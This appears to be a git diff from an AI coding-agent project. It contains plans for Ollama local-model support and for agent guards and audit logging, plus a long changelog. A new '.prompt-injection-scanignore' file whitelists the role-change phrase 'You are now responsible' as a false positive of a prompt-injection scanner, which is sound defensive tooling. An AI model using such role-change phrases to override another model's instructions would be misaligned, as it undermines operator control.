+- `/model ollama/llama3.1:8b` works without any config file
+- If Ollama isn't running, extension is silent — no errors, no models listed
+- `models.json` overrides still work (user config wins over auto-discovery)
+
+### Phase 2: Native Ollama API Provider (`/api/chat`)
+
+**What:** A dedicated streaming provider that talks Ollama's native protocol instead of the OpenAI compatibility shim.
+
+**Extension files:**
+- `ollama/ollama-provider.ts` — Native `/api/chat` streaming:
+  - Registers `"ollama-chat"` API with `registerApiProvider()`
+  - Implements `stream()` and `streamSimple()`:
+    - Maps GSD `Context` → Ollama messages format
+    - Maps GSD `Tool[]` → Ollama tool format
+    - Streams NDJSON responses, maps back to `AssistantMessage` events
+    - Extracts `<think>` blocks for reasoning models (deepseek-r1, qwq)
+  - Ollama-specific options:
+    - `keep_alive` — control model memory retention (default: "5m")
+    - `num_ctx` — pass through model's context window
+    - `num_predict` — max output tokens
+    - Temperature, top_p, top_k
+  - Response metadata:
+    - `eval_count` / `eval_duration` → tokens/sec in usage stats
+    - `total_duration`, `load_duration` → performance visibility
+  - Vision support: converts image content to base64 for multimodal models
+
+**Core changes:**
+- `packages/pi-ai/src/types.ts` — Add `"ollama-chat"` to `KnownApi`
+
+**Phase 1 models switch to `api: "ollama-chat"` by default.** Users can force OpenAI-compat via `models.json` override if needed.
+
+**Why native over OpenAI-compat:**
+- Full `keep_alive` / `num_ctx` control
+- Better error messages (Ollama-native vs generic OpenAI)
+- More reliable tool calling on Ollama's native format
+- Performance metrics in response (tokens/sec)
+- Foundation for model management commands
+
+### Phase 3: Local LLM Management UX
+
+**What:** `/ollama` slash commands and an LLM tool for model management.
+
+**Extension files:**
+- `ollama/ollama-commands.ts` — Slash commands registered via `pi.registerCommand()`:
+  - `/ollama` — Status overview:
+    ```
+    Ollama v0.5.7 — running (localhost:11434)
+
+    Loaded:
+      llama3.1:8b       4.7 GB VRAM   idle 3m
+
+    Available:
+      llama3.1:8b       (4.7 GB)
+      qwen2.5-coder:7b  (4.4 GB)
+      deepseek-r1:8b    (4.9 GB)
+    ```
+  - `/ollama pull <model>` — Pull with streaming progress via `ctx.ui.setWidget()`
+  - `/ollama list` — List all local models with sizes and families
+  - `/ollama remove <model>` — Delete a model (with confirmation)
+  - `/ollama ps` — Running models + VRAM usage
+- `ollama/ollama-tool.ts` — LLM-callable tool registered via `pi.registerTool()`:
+  - `ollama_manage` tool — lets the agent pull/list/check models
+  - Parameters: `{ action: "list" | "pull" | "status" | "ps", model?: string }`
+  - Use case: agent detects it needs a model, pulls it automatically
+
+**UX Flow:**
+```
+$ gsd
+> /ollama
+Ollama v0.5.7 — running (localhost:11434)
+Loaded:
+  llama3.1:8b    — 4.7 GB VRAM, idle 3m
+Available:
+  llama3.1:8b    (4.7 GB)
+  qwen2.5-coder:7b (4.4 GB)
+  deepseek-r1:8b (4.9 GB)
+
+> /ollama pull codestral:22b
+Pulling codestral:22b...
+████████████████████████████░░░░ 78% (14.2 GB / 18.1 GB)
+✓ codestral:22b ready
+
+> /model ollama/codestral:22b
+Switched to codestral:22b (local, Ollama)
+```
+
+## Implementation Order
+
+1. **Phase 1** — Auto-discovery with OpenAI-compat routing. Biggest user impact, smallest risk.
+2. **Phase 3** — Management UX (`/ollama` commands). Valuable even before native API.
+3. **Phase 2** — Native `/api/chat` provider. Optimization over OpenAI-compat; do last.
+
+## Core Changes Summary (minimal)
+
+| File | Change |
+|------|--------|
+| `packages/pi-ai/src/types.ts` | Add `"ollama"` to `KnownProvider`, `"ollama-chat"` to `KnownApi` (Phase 2) |
+| `packages/pi-ai/src/env-api-keys.ts` | Add `"ollama"` → always returns `"ollama"` placeholder |
+| `src/onboarding.ts` | Add `"ollama"` to provider picker |
+| `src/wizard.ts` | Add `"ollama"` key mapping (no key required) |
+
+Everything else lives in `src/resources/extensions/ollama/`.
+
+## Risks & Mitigations
+
+| Risk | Mitigation |
+|------|------------|
+| Ollama not running — startup probe latency | 1.5s timeout; cache result; probe async so it doesn't block TUI paint |
+| Model capabilities unknown | Known-model table + `/api/show` fallback + parameter_size estimation |
+| Tool calling unreliable on small models | Detect param count; warn on <7B models |
+| Ollama API changes between versions | Version detect via `/api/version`; stable endpoints only |
+| Conflicts with `models.json` Ollama config | User config always wins; auto-discovered models merge beneath manual config |
+| Extension disabled — no impact on core | Extension is additive; disabling removes all Ollama features cleanly |
+
+## Testing Strategy
+
+- Unit tests: `ollama-client.ts` with mocked fetch responses
+- Unit tests: `ollama-discovery.ts` model capability parsing
+- Unit tests: `ollama-provider.ts` message format mapping + NDJSON stream parsing
+- Unit tests: `model-capabilities.ts` known model lookups
+- Integration test: mock HTTP server simulating Ollama `/api/tags`, `/api/chat`, `/api/pull`
+- Manual test: real Ollama instance with llama3.1, qwen2.5-coder, deepseek-r1
+
+## Open Questions
+
+1. **Startup probe** — Probe Ollama on `session_start` (adds ~1.5s if not running) or lazy on first `/model`? **Recommendation: async probe on session_start (non-blocking), eager if `OLLAMA_HOST` is set.**
+2. **Auto-start** — Try to launch Ollama if installed but not running? **Recommendation: no — too invasive. Show helpful message in `/ollama` status.**
+3. **Vision support** — Support multimodal models (llava, etc.) in Phase 2 native API? **Recommendation: yes, detected via capabilities table.**
+4. **Model refresh** — How often to re-probe Ollama for new models? **Recommendation: on `/ollama list`, on `/model` command, and every 5 min (existing TTL).**
diff --git a/.plans/onboarding-detection-wizard.md b/.plans/onboarding-detection-wizard.md
index 0f6d0044f..5d1e5a2e2 100644
--- a/.plans/onboarding-detection-wizard.md
+++ b/.plans/onboarding-detection-wizard.md
@@ -134,7 +134,7 @@ Quick filesystem scan (no heavy reads):
 
 ### Task 1.4: `isFirstEverLaunch(): boolean`
 
-Returns `true` if `~/.gsd/` doesn't exist or has no `preferences.md`.
+Returns `true` if `~/.gsd/` doesn't exist or has no `PREFERENCES.md`.
 
 ---
 
@@ -298,7 +298,7 @@ Step 8: Advanced (collapsed by default, expandable)
 
 Step 9: Bootstrap .gsd/ structure
    - Creates .gsd/milestones/
-   - Creates .gsd/preferences.md (from wizard answers)
+   - Creates .gsd/PREFERENCES.md (from wizard answers)
    - Creates .gitignore entries
    - Seeds CONTEXT.md with detected project signals
    - Commits "chore: init gsd" (if commit_docs enabled)
diff --git a/.plans/preferences-wizard-completeness.md b/.plans/preferences-wizard-completeness.md
index 5709d7f21..bb6a353d0 100644
--- a/.plans/preferences-wizard-completeness.md
+++ b/.plans/preferences-wizard-completeness.md
@@ -42,7 +42,7 @@ The `/gsd prefs wizard` currently only configures 6 of 18+ preference fields. Us
 - Added missing keys to `orderedKeys` in `serializePreferencesToFrontmatter()`
 
 ### Group 6: Update Template & Docs ✓
-- Updated `templates/preferences.md` with new fields
+- Updated `templates/PREFERENCES.md` with new fields
 - Updated `docs/preferences-reference.md` with budget, notifications, git, hooks
 
 ### Group 7: Tests ✓
diff --git a/.plans/single-writer-engine-v3-control-plane.md b/.plans/single-writer-engine-v3-control-plane.md
new file mode 100644
index 000000000..ad294ef55
--- /dev/null
+++ b/.plans/single-writer-engine-v3-control-plane.md
@@ -0,0 +1,396 @@
+# Single-Writer Engine v3: Agent Control Plane
+# Plan: State machine guards + actor causation + reversibility
+# Created: 2026-03-25
+
+---
+
+## Background
+
+v2 gave the engine **write discipline** — agents can't corrupt STATE.md directly,
+every mutation goes through the DB, event log is append-only.
+
+What v2 did NOT give us: **behavioral control**.  Agents can still:
+- Complete a task twice (silent overwrite)
+- Complete a slice with open tasks (if they bypass the slice status check)
+- Complete a milestone in any status
+- Re-plan already-completed slices/tasks
+- Call any tool on any unit regardless of ownership
+- Leave no trace of *who* did what or *why*
+
+This plan bundles three work streams that close those gaps together, since they
+share infrastructure (WorkflowEvent schema, DB query surface, handler preconditions).
+
+---
+
+## Work Streams
+
+### Stream 1 — State Machine Guards (P0)
+Add precondition checks to all 8 tool handlers so invalid transitions return an
+error instead of silently succeeding.
+
+### Stream 2 — Actor Identity + Persistent Audit Log (P1)
+Extend `WorkflowEvent` with `actor_name` and `trigger_reason`. Flush the
+in-process `workflow-logger` buffer to a persistent `.gsd/audit-log.jsonl`
+after every tool invocation, so "who did what and why" is durable.
+
+### Stream 3 — Reversibility + Unit Ownership (P2)
+Add `gsd_task_reopen` and `gsd_slice_reopen` tools. Add a unit-ownership
+validation layer so an agent can only complete/reopen units it explicitly claimed.
+
+---
+
+## Detailed Task Breakdown
+
+---
+
+### Stream 1: State Machine Guards
+
+#### S1-T1: Add `getTask`, `getSlice`, `getMilestone` existence helpers to `gsd-db.ts`
+
+**Files:** `src/resources/extensions/gsd/gsd-db.ts`
+
+These are read-only DB helpers to confirm an entity exists and return its current
+`status` field before any mutation. Each returns `null` if not found.
+
+```ts
+getTask(taskId: string, sliceId: string): { status: string } | null
+getSlice(sliceId: string, milestoneId: string): { status: string } | null
+getMilestoneById(milestoneId: string): { status: string } | null
+```
+
+Note: `getSlice` may already exist — check before adding a duplicate. The audit
+report references it in `complete-slice.ts` line 207 but only to list tasks.
+Need a version that returns the slice row itself.
+
+---
+
+#### S1-T2: Guard `complete-task.ts` — enforce valid transitions
+
+**File:** `src/resources/extensions/gsd/tools/complete-task.ts`
+
+Preconditions to add (before the transaction block):
+1. `getMilestoneById(milestoneId)` → must exist, must NOT be `"complete"` or `"done"`
+2. `getSlice(sliceId, milestoneId)` → must exist, must be `"pending"` or `"in_progress"`
+3. `getTask(taskId, sliceId)` → if exists, status must be `"pending"` (not already `"complete"`)
+
+On failure: return `{ error: "<reason>" }` — do NOT throw.
+
+---
+
+#### S1-T3: Guard `complete-slice.ts` — enforce valid transitions
+
+**File:** `src/resources/extensions/gsd/tools/complete-slice.ts`
+
+Preconditions to add:
+1. `getSlice(sliceId, milestoneId)` → must exist, status must be `"pending"` or `"in_progress"` (not already `"complete"`)
+2. `getMilestoneById(milestoneId)` → must exist, must NOT be `"complete"`
+3. All tasks in slice must be `"complete"` (already enforced — keep it, add explicit slice-status check before this)
+
+---
+
+#### S1-T4: Guard `complete-milestone.ts` — enforce valid transitions
+
+**File:** `src/resources/extensions/gsd/tools/complete-milestone.ts`
+
+Preconditions to add:
+1. `getMilestoneById(milestoneId)` → must exist, status must be `"active"` (not already `"complete"`)
+2. Keep existing all-slices-complete check
+3. Add deep check: all tasks across all slices must also be `"complete"` (not just slice status)
+
+---
+
+#### S1-T5: Guard `plan-task.ts` — block re-planning completed tasks
+
+**File:** `src/resources/extensions/gsd/tools/plan-task.ts`
+
+Preconditions to add:
+1. `getSlice(sliceId, milestoneId)` → must exist, status must NOT be `"complete"` (already blocks planning on a closed slice)
+2. If task exists (`getTask`), status must be `"pending"` — block re-planning a `"complete"` task
+
+---
+
+#### S1-T6: Guard `plan-slice.ts` — block re-planning completed slices
+
+**File:** `src/resources/extensions/gsd/tools/plan-slice.ts`
+
+Preconditions to add:
+1. `getSlice(sliceId, milestoneId)` → if exists, status must NOT be `"complete"`
+2. `getMilestoneById(milestoneId)` → must exist, status must NOT be `"complete"`
+
+---
+
+#### S1-T7: Guard `plan-milestone.ts` — block re-planning completed milestones
+
+**File:** `src/resources/extensions/gsd/tools/plan-milestone.ts`
+
+Preconditions to add:
+1. If milestone exists (`getMilestoneById`), status must NOT be `"complete"`
+2. Validate `depends_on` array: each referenced milestoneId must exist and be `"complete"` before this milestone can be planned
+
+---
+
+#### S1-T8: Guard `reassess-roadmap.ts` — verify completedSliceId is actually complete
+
+**File:** `src/resources/extensions/gsd/tools/reassess-roadmap.ts`
+
+Gap: `completedSliceId` is accepted without confirming it is actually `"complete"` status.
+Also: no check that milestone is still `"active"` (could reassess after milestone is done).
+
+Preconditions to add:
+1. `getSlice(completedSliceId, milestoneId)` → status must be `"complete"`
+2. `getMilestoneById(milestoneId)` → status must be `"active"`
+
+---
+
+#### S1-T9: Guard `replan-slice.ts` — verify blockerTaskId exists and is complete
+
+**File:** `src/resources/extensions/gsd/tools/replan-slice.ts`
+
+Gaps:
+- `blockerTaskId` is accepted without verifying it exists or is `"complete"`
+- No check that slice is still `"in_progress"` (could replan after slice is complete)
+
+Preconditions to add:
+1. `getSlice(sliceId, milestoneId)` → status must be `"in_progress"` or `"pending"`, NOT `"complete"`
+2. `getTask(blockerTaskId, sliceId)` → must exist, status must be `"complete"`
+
+---
+
+### Stream 2: Actor Identity + Persistent Audit Log
+
+#### S2-T1: Extend `WorkflowEvent` with actor identity and causation fields
+
+**File:** `src/resources/extensions/gsd/workflow-events.ts`
+
+Extend the `WorkflowEvent` interface:
+```ts
+export interface WorkflowEvent {
+  cmd: string;
+  params: Record<string, unknown>;
+  ts: string;
+  hash: string;
+  actor: "agent" | "system";
+  actor_name?: string;       // ADD: e.g. "executor-agent-01", "gsd-orchestrator"
+  trigger_reason?: string;   // ADD: e.g. "plan-phase complete", "user invoked gsd_complete_task"
+  session_id?: string;       // ADD: process.env.GSD_SESSION_ID if set
+}
+```
+
+Update `appendEvent` to accept and persist these new optional fields.
+Hash computation must remain stable (still hashes only `cmd + params`, not the new fields)
+so fork detection isn't broken.
+
+---
+
+#### S2-T2: Update all 8 tool handlers to pass actor identity to `appendEvent`
+
+**Files:** All 8 handlers in `src/resources/extensions/gsd/tools/`
+
+Each handler receives its inputs. Add a convention where params can include:
+- `actor_name` (optional string) — caller passes their agent identity
+- `trigger_reason` (optional string) — caller passes why this action was triggered
+
+If not provided, default to `actor_name: "agent"`, `trigger_reason: undefined`.
+
+Handlers pass these through to `appendEvent`.
+
+The tool schemas (in the MCP tool definitions) should expose `actor_name` and
+`trigger_reason` as optional string params so agents can self-identify.
+
+---
+
+#### S2-T3: Persist `workflow-logger` to `.gsd/audit-log.jsonl`
+
+**File:** `src/resources/extensions/gsd/workflow-logger.ts`
+
+Current behavior: `_buffer` is in-process memory, drained per-unit and dropped.
+This means errors/warnings disappear across context resets.
+
+Change: After `_push()` writes to the in-process buffer, also append the entry
+to `.gsd/audit-log.jsonl` (using `appendFileSync`). This requires the basePath
+to be available — either pass it as a module-level setter (`setLogBasePath(path)`)
+called at engine init, or accept it as a param on `logWarning`/`logError`.
+
+The audit log format should match `LogEntry` serialized as JSON + newline,
+consistent with `event-log.jsonl`.
+
+---
+
+#### S2-T4: Add `readAuditLog` helper to `workflow-logger.ts`
+
+**File:** `src/resources/extensions/gsd/workflow-logger.ts`
+
+Expose a read function so the auto-loop and diagnostics can surface persistent
+audit entries without replaying the event log:
+
+```ts
+export function readAuditLog(basePath: string): LogEntry[]
+```
+
+---
+
+### Stream 3: Reversibility + Unit Ownership
+
+#### S3-T1: Add `updateTaskStatus` and `updateSliceStatus` DB helpers
+
+**File:** `src/resources/extensions/gsd/gsd-db.ts`
+
+If they don't already exist (check first):
+```ts
+updateTaskStatus(taskId: string, sliceId: string, status: string): void
+updateSliceStatus(sliceId: string, milestoneId: string, status: string): void
+```
+
+These are the write primitives needed by reopen tools.
+
+---
+
+#### S3-T2: Implement `gsd_task_reopen` tool handler
+
+**New file:** `src/resources/extensions/gsd/tools/reopen-task.ts`
+
+Logic:
+1. Validate `taskId`, `sliceId`, `milestoneId` are non-empty strings
+2. `getTask(taskId, sliceId)` → must exist, status must be `"complete"` (can't reopen what isn't closed)
+3. `getSlice(sliceId, milestoneId)` → must exist, status must NOT be `"complete"` (can't reopen a task inside a closed slice — too late)
+4. `getMilestoneById(milestoneId)` → must exist, status must NOT be `"complete"`
+5. In a transaction: `updateTaskStatus(taskId, sliceId, "pending")`
+6. Append event: `cmd: "reopen_task"`, include `actor_name`, `trigger_reason`
+7. Invalidate state cache + render projections
+
+---
+
+#### S3-T3: Implement `gsd_slice_reopen` tool handler
+
+**New file:** `src/resources/extensions/gsd/tools/reopen-slice.ts`
+
+Logic:
+1. Validate `sliceId`, `milestoneId`
+2. `getSlice(sliceId, milestoneId)` → must exist, status must be `"complete"`
+3. `getMilestoneById(milestoneId)` → must NOT be `"complete"`
+4. In a transaction: `updateSliceStatus(sliceId, milestoneId, "in_progress")` + set all tasks back to `"pending"`
+5. Append event: `cmd: "reopen_slice"`
+6. Invalidate state cache + render projections
+
+---
+
+#### S3-T4: Add unit ownership claim/check mechanism
+
+**New file:** `src/resources/extensions/gsd/unit-ownership.ts`
+
+Lightweight JSON file at `.gsd/unit-claims.json` mapping unit IDs to agent names:
+```json
+{
+  "M01/S01/T01": { "agent": "executor-01", "claimed_at": "2026-03-25T..." },
+  "M01/S01":     { "agent": "executor-01", "claimed_at": "2026-03-25T..." }
+}
+```
+
+Functions:
+```ts
+claimUnit(basePath, unitKey, agentName): void   // atomic write
+releaseUnit(basePath, unitKey): void
+getOwner(basePath, unitKey): string | null
+```
+
+`unitKey` format: `"<milestoneId>/<sliceId>/<taskId>"` for tasks, `"<milestoneId>/<sliceId>"` for slices.
+
+---
+
+#### S3-T5: Wire ownership check into `complete-task` and `complete-slice`
+
+**Files:** `complete-task.ts`, `complete-slice.ts`
+
+If `actor_name` is provided AND `.gsd/unit-claims.json` exists AND the unit is claimed:
+- Verify `actor_name` matches the registered owner
+- If mismatch: return `{ error: "Unit <key> is owned by <owner>, not <actor>" }`
+- If no claim file / unit is unclaimed: allow the operation (opt-in ownership)
+
+Ownership is enforced only when claims are present, keeping the feature opt-in.
+
+---
+
+## Files Changed Summary
+
+| File | Change Type |
+|------|-------------|
+| `gsd-db.ts` | Add `getTask`, `getMilestoneById` existence helpers; add `updateTaskStatus`, `updateSliceStatus` |
+| `workflow-events.ts` | Extend `WorkflowEvent` with `actor_name`, `trigger_reason`, `session_id` |
+| `workflow-logger.ts` | Add persistent flush to `.gsd/audit-log.jsonl`; add `setLogBasePath`; add `readAuditLog` |
+| `tools/complete-task.ts` | State machine guards + ownership check + actor passthrough |
+| `tools/complete-slice.ts` | State machine guards + ownership check + actor passthrough |
+| `tools/complete-milestone.ts` | State machine guards + deep task check |
+| `tools/plan-task.ts` | Block re-planning complete tasks |
+| `tools/plan-slice.ts` | Block re-planning complete slices |
+| `tools/plan-milestone.ts` | Block re-planning complete milestones + depends_on validation |
+| `tools/reassess-roadmap.ts` | Verify completedSliceId status + milestone status check |
+| `tools/replan-slice.ts` | Verify blockerTaskId exists + slice status check |
+| `tools/reopen-task.ts` | NEW — gsd_task_reopen handler |
+| `tools/reopen-slice.ts` | NEW — gsd_slice_reopen handler |
+| `unit-ownership.ts` | NEW — claim/release/check ownership |
+
+---
+
+## Execution Order (Dependencies)
+
+```
+S1-T1 (DB helpers)
+  └── S1-T2 (complete-task guards)
+  └── S1-T3 (complete-slice guards)
+  └── S1-T4 (complete-milestone guards)
+  └── S1-T5 (plan-task guards)
+  └── S1-T6 (plan-slice guards)
+  └── S1-T7 (plan-milestone guards)
+  └── S1-T8 (reassess-roadmap guards)
+  └── S1-T9 (replan-slice guards)
+  └── S3-T1 (updateTask/SliceStatus helpers) ── S3-T2, S3-T3
+
+S2-T1 (WorkflowEvent schema)
+  └── S2-T2 (handler actor passthrough)
+
+S2-T3 (audit-log flush)
+  └── S2-T4 (readAuditLog)
+
+S3-T4 (unit-ownership.ts)
+  └── S3-T5 (wire into complete-task/slice)
+```
+
+Parallelizable:
+- All of Stream 1 (S1-T2 through S1-T9) can run in parallel once S1-T1 is done
+- Stream 2 and Stream 3 are fully independent of Stream 1
+
+---
+
+## What Success Looks Like
+
+After this phase:
+
+1. **Double-complete** → returns `{ error: "Task T01 is already complete" }` instead of silently overwriting
+2. **Complete slice with open tasks** → still blocked (was already caught), plus slice status guard added
+3. **Re-plan closed work** → returns `{ error: "Cannot re-plan: slice S01 is already complete" }`
+4. **Wrong agent completes task** → returns `{ error: "Unit M01/S01/T01 is owned by executor-01, not executor-02" }`
+5. **Post-mortem** → `.gsd/audit-log.jsonl` has full trace with actor_name + trigger_reason across context resets
+6. **Oops recovery** → `gsd_task_reopen` / `gsd_slice_reopen` without manual SQL surgery
+7. **depends_on enforcement** → cannot plan M02 if M01 is not yet complete
+
+---
+
+## Decisions
+
+1. **Ownership: opt-in** — enforced only when `.gsd/unit-claims.json` exists. Zero breaking change for existing workflows; teams adopt incrementally.
+
+2. **Slice reopen: reset all tasks to `"pending"`** — simpler invariant. If you're reopening a slice, you're re-doing the work. Partial resets create ambiguous state.
+
+3. **`trigger_reason`: caller-provided** — agents know *why* they acted; the engine can only know *what* was called. Default to `undefined` if not passed.
+
+4. **Session ID: engine-generated** — UUID generated once at engine startup, stored in module state in `workflow-events.ts`. No reliance on agents setting env vars correctly.
+
+5. **Idempotency: fix in this phase** — convert `insertAssessment` and `insertReplanHistory` to upserts (keyed on `milestoneId+sliceId` and `milestoneId+sliceId+ts` respectively). Accumulating duplicate records on retry is a bug, not a feature.
+
+### Additional task from decision 5:
+#### S1-T10: Convert `insertAssessment` and `insertReplanHistory` to upserts
+
+**File:** `src/resources/extensions/gsd/gsd-db.ts`
+
+- `insertAssessment`: upsert keyed on `(milestone_id, completed_slice_id)` — one assessment per completed slice per milestone
+- `insertReplanHistory`: upsert keyed on `(milestone_id, slice_id, blocker_task_id)` — one replan record per blocker per slice
diff --git a/.prompt-injection-scanignore b/.prompt-injection-scanignore
new file mode 100644
index 000000000..b6cc73a03
--- /dev/null
+++ b/.prompt-injection-scanignore
@@ -0,0 +1,2 @@
+# False positives in GSD prompt templates — these are legitimate LLM instructions, not injection
+src/resources/extensions/gsd/prompts/doctor-heal.md:You are now responsible
diff --git a/CHANGELOG.md b/CHANGELOG.md
index b67679841..6abef7517 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -6,6 +6,1009 @@ Format based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/).
 
 ## [Unreleased]
 
+## [2.67.0] - 2026-04-09
+
+### Added
+- **context**: implement R005 decision scope cascade and derive scope from slice metadata
+- **M005**: Tiered Context Injection - relevance-scoped context with 65%+ reduction
+
+### Fixed
+- **test**: align auto-loop test timers with updated session timeout
+- **gsd**: repair CI after branch split
+- **gsd**: repair CI after branch split
+- **gsd**: repair CI after branch split
+- **gsd**: fail closed for discussion gate enforcement
+- **gsd**: harden auto merge recovery and session safety
+- **gsd**: repair overlay, shortcut, and widget surfaces
+- **gsd**: prevent stale workflow reconcile state writes
+- **gsd**: align prompt contracts and validation flow
+- **pi-tui**: harden input parsing and editor focus behavior
+- **remote-questions**: cancel local TUI when remote answer wins the race
+- **auto**: increase session timeout to 120s and treat timeout as recoverable pause (#3767)
+- **ui**: apply anthropic-api display name to all model/provider UI surfaces
+- **ui**: display 'anthropic-api' in GSD preferences wizard provider list
+- **remote-questions**: race local TUI against remote channel instead of remote-only routing
+- **ui**: display 'anthropic-api' in model selector to distinguish from claude-code
+- **gates**: add mechanical enforcement for discussion question gates
+- **prompts**: harden non-bypassable gates and exclude dot-folders from scanning
+- **gsd**: ignore filename headings in parsePlan
+- **providers**: match 'out of extra usage' error and respect claude-code provider in model resolution (#3772)
+- **pi-ai**: recover XML parameters trapped in JSON strings
+- **retry**: guard claude-code fallback to anthropic provider only
+- **providers**: route Anthropic subscription users through Claude Code CLI (#3772)
+- **claude-code**: use native Windows claude lookup
+- **gsd**: suppress repeated preferences section warnings
+- **gsd**: normalize described expected output paths
+- **auto**: resilient transient error recovery — defer to Core RetryHandler and fix cmdCtx race
+
+## [2.66.1] - 2026-04-08
+
+### Fixed
+- **pi-tui**: revert contentCursorRow, use hardwareCursorRow as movement baseline
+- **pi-tui**: use contentCursorRow for render movement baseline instead of cursorRow
+- **gsd**: add logWarning to empty catch block in orphaned worktree cleanup
+- **gsd**: add consecutiveFinalizeTimeouts to LoopState in journal tests
+- **gsd**: add escalation and unit-detach guards to finalize timeout handlers
+- **gsd**: add timeout guard around postUnitPreVerification to prevent auto-loop hang
+- **gsd**: OS-specific keyboard shortcut hints via formatShortcut helper
+- **subagent**: support list-style tools frontmatter
+- clear autocomplete rows from content bottom
+- parse annotated pre-exec file paths
+- **gsd**: add orphaned milestone branch audit at auto-mode bootstrap
+
+## [2.66.0] - 2026-04-08
+
+### Added
+- **gsd**: add fast path for queued milestone discussion
+- **gsd**: add /gsd show-config command
+- **reactive**: graph diagnostics and subagent_model config
+- **dispatch**: parallel research slices and parallel milestone validation
+- **parallel**: worker model override for parallel milestone workers
+
+### Fixed
+- **gsd**: validate depth verification answer before unlocking write-gate
+- **gsd**: revert unknown artifact check to warn-and-proceed
+- **gsd**: add missing cmd field to test base WorkflowEvent
+- **gsd**: address remaining adversarial review findings for wave 3
+- **gsd**: detect concurrent event log growth during reconcile
+- **gsd**: address adversarial review findings for wave 3
+- **gsd**: address adversarial review findings for wave 2
+- **gsd**: address adversarial review findings for wave 1
+- **gsd**: WAL-safe migration backup + stronger regression tests
+- **gsd**: consistency and cleanup (wave 5/5)
+- **gsd**: write safety — atomic writes and randomized tmp paths (wave 4/5)
+- **gsd**: session and recovery robustness (wave 3/5)
+- **gsd**: event log and reconciliation robustness (wave 2/5)
+- **gsd**: critical state machine data integrity fixes (wave 1/5)
+- **gsd**: critical state machine data integrity fixes (wave 1/5)
+- **gsd**: remove ecosystem research stub and address adversarial review
+- **gsd**: suppress model change notification in auto-mode unless verbose
+- **gsd**: exclude task.files from checkTaskOrdering to prevent false positives
+- **state**: skip ghost check for queued milestones in registry build
+- **ci**: replace empty catch blocks and raw stderr with logWarning
+- **logging**: add debugLog to empty catch in reopen-milestone
+- **state-machine**: 9 resilience fixes + 86 regression tests (#3161)
+- **gsd**: add incremental persistence to discuss prompts
+- replace empty catch with logWarning for silent-catch-diagnostics test
+- **test**: escape regex metacharacters in skip-by-preference pattern test
+- **test**: search for numbered step definitions in prompt ordering test
+- **test**: update notes loop test for notesVisible guard behavior
+- **test**: update action count for note captures now included in results
+- **test**: remove extraneous test file from wrong branch
+- **test**: update worktree sync tests to use separate milestone IDs
+- **gsd**: use valid LogComponent type for stale branch guard warning
+- **test**: update rogue detection test for auto-remediation behavior
+- **test**: update stuck-planning test to expect executing after reconciliation
+- **test**: update file path consistency tests for inputs-only checking
+- **test**: add CONTEXT file to queued milestone ghost detection test
+- **test**: update needs-remediation test to expect validating-milestone phase
+- **gsd**: import all-done milestones as complete during DB migration
+- **gsd**: allow milestone completion when validation skipped by preference
+- **gsd**: set slice sequence at all three insertion sites
+- **gsd**: four prompt/runtime fixes for completion and session stability
+- **gsd**: default insertMilestone status to queued instead of active
+- **gsd**: suppress repeated frontmatter YAML parse warnings
+- **gsd**: normalize list inputs in complete-task + fix roadmap dep parsing
+- **gsd**: open DB before status derivation + respect isolation:none in quick
+- **gsd**: add .bg-shell/ to baseline gitignore patterns
+- **tui**: prevent Enter key infinite loop in interview notes mode
+- **provider**: handle Enter key to initiate auth setup in provider manager
+- **gsd**: cap run-uat dispatch attempts to prevent infinite replay loop
+- **mcp**: use createRequire to resolve SDK wildcard subpath imports
+- **gsd**: mark note captures as executed in executeTriageResolutions
+- **gsd**: validate main_branch preference exists before using in merge
+- **gsd**: handle deleted cwd in projectRoot to prevent ENOENT crash
+- **gsd**: skip current milestone in syncWorktreeStateBack to prevent merge conflicts
+- **gsd**: add structuredQuestionsAvailable conditional to slice discuss
+- **gsd**: restore full tool set after discuss flow scoping
+- **gsd**: tighten verifyExpectedArtifact to prevent rogue-write false positives
+- **gsd**: add verification gate to complete-slice tool
+- **gsd**: fix pre-execution-checks false positives from backticks and task.files
+- **gsd**: stop renderAllProjections from overwriting authoritative PLAN.md
+- **gsd**: auto-checkout to main when isolation:none finds stale milestone branch
+- **gsd**: auto-remediate stale slice DB status when SUMMARY exists on disk
+- **gsd**: open DB on demand in gsd_milestone_status for non-auto sessions
+- **gsd**: detect phantom milestones from abandoned gsd_milestone_generate_id
+- **gsd**: force re-validation when verdict is needs-remediation
+- **gsd**: exclude closed slices from findMissingSummaries check
+- **gsd**: recover from stale lockfile after crash or SIGKILL
+- **gsd**: add createdAt timestamp and 30s age guard to staleness check
+- **gsd**: clear stale pendingAutoStart after /clear interrupts discussion
+- **gsd**: suppress misleading warnings for expected ENOENT/EISDIR conditions
+- **gsd**: extract real error from message content when errorMessage is useless
+- **gsd**: extract real error from message content when errorMessage is useless
+- **gsd**: show accurate pause message for queued-user-message skip
+- **gsd**: treat queued-user-message skip as non-retryable interruption
+- **gsd**: recognize "Not provided." default in isVerificationNotApplicable
+- **gsd**: discoverManifests skips symlinked extension directories
+- **gsd**: recognize "Not provided." default in isVerificationNotApplicable
+- **gsd**: reconcile plan-file tasks into DB when planner skips persistence (#3600)
+- **gsd**: use isClosedStatus() in dispatch guard instead of raw complete check
+- **browser-tools**: make sharp an optional lazy dependency
+- **gsd**: pass required arguments in defer-milestone-stamp test
+- **gsd**: replace remaining empty catch with logWarning
+- **gsd**: use logWarning instead of raw stderr in catch blocks
+- **gsd**: log error instead of empty catch in STATE.md rebuild
+- **gsd**: log error instead of empty catch in skip_slice
+- **gsd**: cast milestone classification to string for type safety
+- **gsd**: treat zero-slice roadmap as pre-planning in guided flow
+- **gsd**: rebuild STATE.md after skip-slice and strengthen rethink prompt
+- **gsd**: use main_branch preference in worktree creation
+- **gsd**: stamp defer and milestone captures as executed after triage
+- **tui**: treat absolute file paths as plain text, not commands
+- **tui**: break infinite re-render loop for images in cmux
+- **gsd**: rebuild STATE.md before guided-flow dispatch
+- **gsd**: defer queued shells in active milestone selection
+- **retry**: prevent 429 quota cascade and 30-min lockout
+- **gsd**: add fastPathInstruction to buildDiscussMilestonePrompt loadPrompt call
+
+### Changed
+- auto-commit after quick-task
+- auto-commit after quick-task
+- auto-commit after quick-task
+- auto-commit after quick-task
+- auto-commit after quick-task
+- auto-commit after quick-task
+- auto-commit after quick-task
+
+## [2.65.0] - 2026-04-07
+
+### Added
+- **gsd**: persistent notification panel with TUI overlay, widget, and web API
+- **gsd**: wire blocking behavior and strict mode for enhanced verification
+- **gsd**: add post-execution cross-task consistency checks
+- **gsd**: add pre-execution plan verification checks
+
+### Fixed
